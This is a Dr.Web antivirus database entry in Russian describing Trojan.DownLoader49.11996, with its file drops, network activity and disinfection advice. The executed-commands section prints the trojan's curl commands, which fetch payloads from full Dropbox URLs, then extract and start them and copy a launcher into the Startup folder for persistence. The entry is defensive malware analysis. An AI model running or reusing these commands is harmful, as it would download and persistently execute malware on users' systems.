Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.DownLoader49.11996

Добавлен в вирусную базу Dr.Web: 2025-11-07

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
  • %APPDATA%\microsoft\windows\start menu\programs\startup\launch.vbs
Изменения в файловой системе
Создает следующие файлы
  • <SYSTEM32>\windowspowershell\v1.0\portableclient-2.zip
  • <SYSTEM32>\windowspowershell\v1.0\startvbs.exe
  • %HOMEPATH%\portableclient\portableclient\client8.pyw
  • %HOMEPATH%\portableclient\portableclient\launch.vbs
  • %HOMEPATH%\portableclient\portableclient\python\_asyncio.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_bz2.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_ctypes.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_decimal.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_elementtree.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_hashlib.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_lzma.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_multiprocessing.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_overlapped.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_queue.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_socket.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_sqlite3.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_ssl.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_uuid.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_wmi.pyd
  • %HOMEPATH%\portableclient\portableclient\python\_zoneinfo.pyd
  • %HOMEPATH%\portableclient\portableclient\python\libcrypto-3.dll
  • %HOMEPATH%\portableclient\portableclient\python\libffi-8.dll
  • %HOMEPATH%\portableclient\portableclient\python\libssl-3.dll
  • %HOMEPATH%\portableclient\portableclient\python\license.txt
  • %HOMEPATH%\portableclient\portableclient\python\pyexpat.pyd
  • %HOMEPATH%\portableclient\portableclient\python\python.cat
  • %HOMEPATH%\portableclient\portableclient\python\python.exe
  • %HOMEPATH%\portableclient\portableclient\python\python3.dll
  • %HOMEPATH%\portableclient\portableclient\python\python313._pth
  • %HOMEPATH%\portableclient\portableclient\python\python313.dll
  • %HOMEPATH%\portableclient\portableclient\python\python313.zip
  • %HOMEPATH%\portableclient\portableclient\python\pythonw.exe
  • %HOMEPATH%\portableclient\portableclient\python\select.pyd
  • %HOMEPATH%\portableclient\portableclient\python\sqlite3.dll
  • %HOMEPATH%\portableclient\portableclient\python\unicodedata.pyd
  • %HOMEPATH%\portableclient\portableclient\python\vcruntime140.dll
  • %HOMEPATH%\portableclient\portableclient\python\vcruntime140_1.dll
  • %HOMEPATH%\portableclient\portableclient\python\winsound.pyd
  • %HOMEPATH%\portableclient\portableclient\start.bat
Сетевая активность
Подключается к
  • 'dr##box.com':443
  • 'uc#############e42ca7d6aee64.dl.dropboxusercontent.com':443
  • 'uc#############e3e29deb05241.dl.dropboxusercontent.com':443
TCP
Запросы HTTP GET
  • http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?2f##############
Другие
  • 'dr##box.com':443
  • 'uc#############e3e29deb05241.dl.dropboxusercontent.com':443
UDP
  • DNS ASK dr##box.com
  • DNS ASK uc#############e42ca7d6aee64.dl.dropboxusercontent.com
  • DNS ASK uc#############e3e29deb05241.dl.dropboxusercontent.com
Другое
Создает и запускает на исполнение
  • '<SYSTEM32>\windowspowershell\v1.0\startvbs.exe'
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c curl -L -o PortableClient-2.zip "https://www.dropbox.com/scl/fi/zphcful1vhiatki7il7u5/PortableClient-1.zip?rlkey=k0a653p5k8mg6nacrb81x3x4b&st=ryjkasmo&dl=1"
  • '<SYSTEM32>\curl.exe' -L -o PortableClient-2.zip "https://www.dropbox.com/scl/fi/zphcful1vhiatki7il7u5/PortableClient-1.zip?rlkey=k0a653p5k8mg6nacrb81x3x4b&st=ryjkasmo&dl=1"
  • '<SYSTEM32>\cmd.exe' /c curl -L -o startvbs.exe "https://www.dropbox.com/scl/fi/zo5gmaxuafhliq5ye7fhl/test.exe?rlkey=ydbfjmibywtxdj9onj1m1sfab&st=2fnre62b&dl=1"
  • '<SYSTEM32>\curl.exe' -L -o startvbs.exe "https://www.dropbox.com/scl/fi/zo5gmaxuafhliq5ye7fhl/test.exe?rlkey=ydbfjmibywtxdj9onj1m1sfab&st=2fnre62b&dl=1"
  • '<SYSTEM32>\cmd.exe' /c mkdir "%USERPROFILE%\Portableclient" 2>nul
  • '<SYSTEM32>\cmd.exe' /c tar -xf PortableClient-2.zip -C "%USERPROFILE%\PortableClient"
  • '<SYSTEM32>\tar.exe' -xf PortableClient-2.zip -C "%HOMEPATH%\PortableClient"
  • '<SYSTEM32>\cmd.exe' /c start startvbs.exe
  • '<SYSTEM32>\cmd.exe' /c copy "%USERPROFILE%\Portableclient\PortableClient\launch.vbs" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" >nul 2>&1

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке